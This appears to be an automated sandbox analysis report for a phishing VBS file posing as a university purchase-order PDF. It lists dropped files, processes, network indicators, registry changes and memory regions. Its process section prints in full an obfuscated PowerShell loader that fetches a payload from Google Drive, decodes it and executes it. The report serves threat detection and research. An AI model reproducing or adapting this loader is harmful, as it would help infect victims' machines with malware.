Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_doe0e0ce.hu1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dre4wyz4.ekz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziide4ti.rqg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsgk0oni.34m.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Tavell.Vrd
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers
Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function
Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers
-lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ &
($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0
Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern
Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc
annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2
Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst,
';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal
meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr
qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En
ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus
'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne
(Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e
UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia
,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed
UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT
Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP
oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud
Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B
ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Manius=(Stratocumulus
'Teena$ ind gIn ralIrrelOp.escB He mA EtioLJuece:R sikr Op aeTilluvVejskiCreagS BodeoColporIchthS Forl=UrtesnThefteChr mw
Impu-S.ussoSlattbchookjUnderEHeretCSpidst all AgorsNon,rySpiseSRetirtCatchEAgnelmFilm,.AselanDutteeFo sttA tik. vampWSuperE
BaghB KondCC nniLtele I TrkneI dkbnH perT Pelu ');Romancerne ($Manius);Romancerne (Stratocumulus ' angb$DimenR PrioeSigvav
OptaiOpiops CitrobundprMachisUnfra.TekstH FlareRadiaaBrod.dV.rtueSeptorRotansMonst[Torso$FortaRSubtreDiscadAntiaaEncork UgektgrammiAdmonoAntednInte
eNskesr SkarnPauseeudjaesEnam.]Ronni=omkla$ Me lTColore ivinrTor,hmFormioReak.mPro oeToba tNataleEtmaarGunl,e AmphtLap o ');$Controvert=Stratocumulus
' Nont$UnfriRMilite InstvRe,triO erssdext oDataerChangsReent.AnkylDTils oBrikewSilvan verhlFemteoBiparaSibildArb,jF U dei
BflelWakekezooma(odont$StrknCVilfroBranda SkoldPreofjSpex u ikrv edlgan nignBissatl,sti,Frigi$DeviaaV.rboc.iltmo uperl Staao
Dds gDull,yUtilb)Contr ';$acology=$Luksusvrelserne;Romancerne (Stratocumulus ' Aiga$StenvG PerclBesmioHder,BOp inA,nowcLSed
m: FortpSme,trTeetiElungys T maCSkol,o,osprUIldsltCo fl=Vind (FernytPanorESkabmsC.elatAfdra-Lion pCorecaShtgoTNsk.rH Fe r
este$Dro ea Anthc EgenO Pr,dlDestrOCove g HjneYTillb)C art ');while (!$prescout) {Romancerne (Stratocumulus 'Exsec$GobligJordtlSpec
oPrincbCons aNyttelFrdse:Unkn kHyperoReg rm Di tpDolmaoTzolkn isbeeUnd rrLychee upersSwobb=wissi$LimintTill r OutsuAktioedivis
') ;Romancerne $Controvert;Romancerne (Stratocumulus 'pikemSReacttUr oma HandrBav etK,age- .tenSCachilCurbseSem.peuppilpFinge
nexa4 Bota ');Romancerne (Stratocumulus 'Svars$Sud eg cephlG.aato HanebSa,meaSc.tul Frem:TraumpTablorHa mleFragmsDraw cHelseoUnferuRedcotMidda=Givab(,amplTN,nemeScytosKlaustImmor-
P roP BuffaKommutUnpr,hUnsol Skum$QuickaNotomcP denoSynnvlst,ejohovedgDistoyArkip)Hand ') ;Romancerne (Stratocumulus 'Bugal$UudtmgBattllHindeo
Ardub Ti laBoxinlTa kl:GrundRFyrr y S jutGritttSte,deE near Kvins UtchkSlaaeeInte sMidga= skad$Bort g By.tlSnur o Svagb.adroa
jugulEx er:AandsFFloateAst,olOtocrtmanwiaGebrdrGruttbKomple H stjLapard phoveUncrar Magnn iffeeHel rs Meds+Falds+Tvege%Fejlr$havf
KSchilnNarcoa nhealG vnldUnd reTond nShee,dRombeeKlokk. FramcT,lbao GraduR tatnAltastT ebo ') ;$Coadjuvant=$Knaldende[$Rytterskes];}$Woodlike=315055;$Bullwhack=31145;Romancerne
(Stratocumulus ' Arre$CivilgQu lmlNonaroDrvblbArgota NicklDiato: CuddAResu aorbicbAc.ydnBlom i avyan redegUdf rsSyersdSl.vaaSkrupgVan,d
Blind=Start JudypGKropsePerchtSyste-AmatoCLserfodriftnVo attDokkeeFo esnUafhnt Der A ilp$k nciaM talc MilioStraalKlageoHv.ragR,matyOvalt
');Romancerne (Stratocumulus 'Gemm $Magtsg ZigslE ecto BinobBlankaOver.l Admi:Sw,atRAfdriaDiscobGuardbSupe a urbunDek t Decen=Skovp
nonco[XanthSTaiveyIndh sMag htMaskieM rphmScle . WaltCLystbo precnfrekvvGn ereSkolerUn.nstSagos].atte: Lo r: ForuF RetorSymbio
DiscmintenBTho aaIncitsAfskyeHj.le6 Fris4Apo oSVi kstOve arManiciT stynElg,agIdent(Glaym$ProblA KaldaWars.b gglonCam,yiG,mminTilkogMaks
sProtodN onfafo,hagOpsam)Dag e ');Romancerne (Stratocumulus ' airl$indkbgdiskulForfaounad b VskeaP.irelBon e:TidstVRefuta,lamenSkr.edbesvir
RenseEnebonGymnadictereAdlum Recru=Musik Mucig[PruhbSDomsmyD censudelitWes ee HypsmSprog.KanceTIn bre Bengxna retRocke.InspiEMas,onFeedhcKly.koCarl,d
S ori.nducn Hydrg B,mb]apach: peci:BardoA altrSNo seCUnencI,nfreIMungu. StruGLotife ,dedtElastSC eput Pro.rBesl iCen rnBlkhag
arkk(Teist$ KimeR St aa enaebPattebUdgyda ArabnC.amo)ducki ');Romancerne (Stratocumulus 'Irkes$gldelgPla,dlDi,keolipizb Pha,aMidcalHypop:Pu
poBFlyveoSoo lnEncykdTytteaosh obToteslF.rsyeTooth=Pr,gr$pls.bVBeda aB lignSu,dod CacorAsiateNightnMelandFlu reTi,ae.Sve,ssDevilu.innabBaadvsS
ndit Strmr,elefiSkuepn GodkgElint(Upwro$C aisW DisaoE,plaosuperd planl BasiiParrok ommesub o, fami$EkvilBPast u FletlUnreslKultuwD.mmeh
AftoaFu,iocSkadekDiddy)Tugte ');Romancerne $Bondable;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers
Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function
Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers
-lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ &
($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0
Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern
Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc
annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2
Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst,
';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal
meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr
qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En
ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus
'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne
(Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e
UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia
,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed
UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT
Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP
oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud
Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B
ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Manius=(Stratocumulus
'Teena$ ind gIn ralIrrelOp.escB He mA EtioLJuece:R sikr Op aeTilluvVejskiCreagS BodeoColporIchthS Forl=UrtesnThefteChr mw
Impu-S.ussoSlattbchookjUnderEHeretCSpidst all AgorsNon,rySpiseSRetirtCatchEAgnelmFilm,.AselanDutteeFo sttA tik. vampWSuperE
BaghB KondCC nniLtele I TrkneI dkbnH perT Pelu ');Romancerne ($Manius);Romancerne (Stratocumulus ' angb$DimenR PrioeSigvav
OptaiOpiops CitrobundprMachisUnfra.TekstH FlareRadiaaBrod.dV.rtueSeptorRotansMonst[Torso$FortaRSubtreDiscadAntiaaEncork UgektgrammiAdmonoAntednInte
eNskesr SkarnPauseeudjaesEnam.]Ronni=omkla$ Me lTColore ivinrTor,hmFormioReak.mPro oeToba tNataleEtmaarGunl,e AmphtLap o ');$Controvert=Stratocumulus
' Nont$UnfriRMilite InstvRe,triO erssdext oDataerChangsReent.AnkylDTils oBrikewSilvan verhlFemteoBiparaSibildArb,jF U dei
BflelWakekezooma(odont$StrknCVilfroBranda SkoldPreofjSpex u ikrv edlgan nignBissatl,sti,Frigi$DeviaaV.rboc.iltmo uperl Staao
Dds gDull,yUtilb)Contr ';$acology=$Luksusvrelserne;Romancerne (Stratocumulus ' Aiga$StenvG PerclBesmioHder,BOp inA,nowcLSed
m: FortpSme,trTeetiElungys T maCSkol,o,osprUIldsltCo fl=Vind (FernytPanorESkabmsC.elatAfdra-Lion pCorecaShtgoTNsk.rH Fe r
este$Dro ea Anthc EgenO Pr,dlDestrOCove g HjneYTillb)C art ');while (!$prescout) {Romancerne (Stratocumulus 'Exsec$GobligJordtlSpec
oPrincbCons aNyttelFrdse:Unkn kHyperoReg rm Di tpDolmaoTzolkn isbeeUnd rrLychee upersSwobb=wissi$LimintTill r OutsuAktioedivis
') ;Romancerne $Controvert;Romancerne (Stratocumulus 'pikemSReacttUr oma HandrBav etK,age- .tenSCachilCurbseSem.peuppilpFinge
nexa4 Bota ');Romancerne (Stratocumulus 'Svars$Sud eg cephlG.aato HanebSa,meaSc.tul Frem:TraumpTablorHa mleFragmsDraw cHelseoUnferuRedcotMidda=Givab(,amplTN,nemeScytosKlaustImmor-
P roP BuffaKommutUnpr,hUnsol Skum$QuickaNotomcP denoSynnvlst,ejohovedgDistoyArkip)Hand ') ;Romancerne (Stratocumulus 'Bugal$UudtmgBattllHindeo
Ardub Ti laBoxinlTa kl:GrundRFyrr y S jutGritttSte,deE near Kvins UtchkSlaaeeInte sMidga= skad$Bort g By.tlSnur o Svagb.adroa
jugulEx er:AandsFFloateAst,olOtocrtmanwiaGebrdrGruttbKomple H stjLapard phoveUncrar Magnn iffeeHel rs Meds+Falds+Tvege%Fejlr$havf
KSchilnNarcoa nhealG vnldUnd reTond nShee,dRombeeKlokk. FramcT,lbao GraduR tatnAltastT ebo ') ;$Coadjuvant=$Knaldende[$Rytterskes];}$Woodlike=315055;$Bullwhack=31145;Romancerne
(Stratocumulus ' Arre$CivilgQu lmlNonaroDrvblbArgota NicklDiato: CuddAResu aorbicbAc.ydnBlom i avyan redegUdf rsSyersdSl.vaaSkrupgVan,d
Blind=Start JudypGKropsePerchtSyste-AmatoCLserfodriftnVo attDokkeeFo esnUafhnt Der A ilp$k nciaM talc MilioStraalKlageoHv.ragR,matyOvalt
');Romancerne (Stratocumulus 'Gemm $Magtsg ZigslE ecto BinobBlankaOver.l Admi:Sw,atRAfdriaDiscobGuardbSupe a urbunDek t Decen=Skovp
nonco[XanthSTaiveyIndh sMag htMaskieM rphmScle . WaltCLystbo precnfrekvvGn ereSkolerUn.nstSagos].atte: Lo r: ForuF RetorSymbio
DiscmintenBTho aaIncitsAfskyeHj.le6 Fris4Apo oSVi kstOve arManiciT stynElg,agIdent(Glaym$ProblA KaldaWars.b gglonCam,yiG,mminTilkogMaks
sProtodN onfafo,hagOpsam)Dag e ');Romancerne (Stratocumulus ' airl$indkbgdiskulForfaounad b VskeaP.irelBon e:TidstVRefuta,lamenSkr.edbesvir
RenseEnebonGymnadictereAdlum Recru=Musik Mucig[PruhbSDomsmyD censudelitWes ee HypsmSprog.KanceTIn bre Bengxna retRocke.InspiEMas,onFeedhcKly.koCarl,d
S ori.nducn Hydrg B,mb]apach: peci:BardoA altrSNo seCUnencI,nfreIMungu. StruGLotife ,dedtElastSC eput Pro.rBesl iCen rnBlkhag
arkk(Teist$ KimeR St aa enaebPattebUdgyda ArabnC.amo)ducki ');Romancerne (Stratocumulus 'Irkes$gldelgPla,dlDi,keolipizb Pha,aMidcalHypop:Pu
poBFlyveoSoo lnEncykdTytteaosh obToteslF.rsyeTooth=Pr,gr$pls.bVBeda aB lignSu,dod CacorAsiateNightnMelandFlu reTi,ae.Sve,ssDevilu.innabBaadvsS
ndit Strmr,elefiSkuepn GodkgElint(Upwro$C aisW DisaoE,plaosuperd planl BasiiParrok ommesub o, fami$EkvilBPast u FletlUnreslKultuwD.mmeh
AftoaFu,iocSkadekDiddy)Tugte ');Romancerne $Bondable;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://137.184.191.215/index.php/check.php?s=am9ntjjw
|
137.184.191.215
|
|
|
|
https://drive.usercontent.google.coma
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://aka.ms/pscore6lBeq
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.googPB
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://137.184.191.215/index.php/check.php?s=am9ntjjwY
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.184.238
|
||
|
drive.usercontent.google.com
|
142.250.184.193
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
137.184.191.215
|
unknown
|
United States
|
|
|
|
142.250.184.193
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.184.238
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\?????????????????????????????????????????? ????
|
188E93
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5624000
|
trusted library allocation
|
page read and write
|
|
|
|
9F62000
|
direct allocation
|
page execute and read and write
|
|
|
|
83B0000
|
direct allocation
|
page execute and read and write
|
|
|
|
B8B000
|
heap
|
page read and write
|
|
|
|
297E5ADD000
|
trusted library allocation
|
page read and write
|
|
|
|
6A00000
|
direct allocation
|
page read and write
|
||
|
C0ED937000
|
stack
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
297EE25C000
|
heap
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
61D2000
|
remote allocation
|
page execute and read and write
|
||
|
7DA0000
|
heap
|
page read and write
|
||
|
297D58F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
7F4F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8440000
|
trusted library allocation
|
page execute and read and write
|
||
|
2970000
|
trusted library section
|
page read and write
|
||
|
B20000
|
direct allocation
|
page read and write
|
||
|
1BD18366000
|
heap
|
page read and write
|
||
|
21D40000
|
remote allocation
|
page read and write
|
||
|
7FF848D26000
|
trusted library allocation
|
page read and write
|
||
|
BBE000
|
heap
|
page read and write
|
||
|
2A67000
|
heap
|
page read and write
|
||
|
297D5F2A000
|
trusted library allocation
|
page read and write
|
||
|
4370000
|
heap
|
page execute and read and write
|
||
|
7FC0000
|
heap
|
page read and write
|
||
|
1BD18299000
|
heap
|
page read and write
|
||
|
1BD18355000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
80BB000
|
heap
|
page read and write
|
||
|
1BD1A161000
|
heap
|
page read and write
|
||
|
1BD1A148000
|
heap
|
page read and write
|
||
|
21580000
|
direct allocation
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
21520000
|
direct allocation
|
page read and write
|
||
|
297EE160000
|
heap
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
436E000
|
stack
|
page read and write
|
||
|
297EE23F000
|
heap
|
page read and write
|
||
|
297D5F68000
|
trusted library allocation
|
page read and write
|
||
|
4DD2000
|
remote allocation
|
page execute and read and write
|
||
|
297D3F6D000
|
heap
|
page read and write
|
||
|
7D70000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
297D780F000
|
trusted library allocation
|
page read and write
|
||
|
297D7895000
|
trusted library allocation
|
page read and write
|
||
|
C0EE58E000
|
stack
|
page read and write
|
||
|
C0ED6FE000
|
stack
|
page read and write
|
||
|
6A50000
|
direct allocation
|
page read and write
|
||
|
297D3F60000
|
heap
|
page read and write
|
||
|
7090000
|
heap
|
page execute and read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
297EE1C8000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
297E5A80000
|
trusted library allocation
|
page read and write
|
||
|
1BD18277000
|
heap
|
page read and write
|
||
|
2994000
|
trusted library allocation
|
page read and write
|
||
|
1BD1A24B000
|
heap
|
page read and write
|
||
|
297D6650000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
297EE230000
|
heap
|
page read and write
|
||
|
297D61DF000
|
trusted library allocation
|
page read and write
|
||
|
B4A000
|
heap
|
page read and write
|
||
|
1BD1A24B000
|
heap
|
page read and write
|
||
|
56697FE000
|
stack
|
page read and write
|
||
|
297D5F01000
|
trusted library allocation
|
page read and write
|
||
|
445E000
|
stack
|
page read and write
|
||
|
6A10000
|
direct allocation
|
page read and write
|
||
|
1BD182D6000
|
heap
|
page read and write
|
||
|
21D40000
|
remote allocation
|
page read and write
|
||
|
1BD1A259000
|
heap
|
page read and write
|
||
|
297D3F8D000
|
heap
|
page read and write
|
||
|
C0EE68A000
|
stack
|
page read and write
|
||
|
1BD18298000
|
heap
|
page read and write
|
||
|
72FC000
|
stack
|
page read and write
|
||
|
2855000
|
heap
|
page read and write
|
||
|
7FF848C74000
|
trusted library allocation
|
page read and write
|
||
|
29A9000
|
trusted library allocation
|
page read and write
|
||
|
297D5EF2000
|
trusted library allocation
|
page read and write
|
||
|
21E0C000
|
stack
|
page read and write
|
||
|
C0EDBBB000
|
stack
|
page read and write
|
||
|
1BD1A13B000
|
heap
|
page read and write
|
||
|
5471000
|
trusted library allocation
|
page read and write
|
||
|
8090000
|
heap
|
page read and write
|
||
|
297E5D66000
|
trusted library allocation
|
page read and write
|
||
|
297D5EE8000
|
trusted library allocation
|
page read and write
|
||
|
1BD184C0000
|
heap
|
page read and write
|
||
|
297EDEC0000
|
heap
|
page read and write
|
||
|
21B4F000
|
stack
|
page read and write
|
||
|
7C87000
|
stack
|
page read and write
|
||
|
809B000
|
heap
|
page read and write
|
||
|
297D5A71000
|
trusted library allocation
|
page read and write
|
||
|
1BD18351000
|
heap
|
page read and write
|
||
|
1BD1A143000
|
heap
|
page read and write
|
||
|
C05000
|
heap
|
page read and write
|
||
|
21550000
|
direct allocation
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
21E50000
|
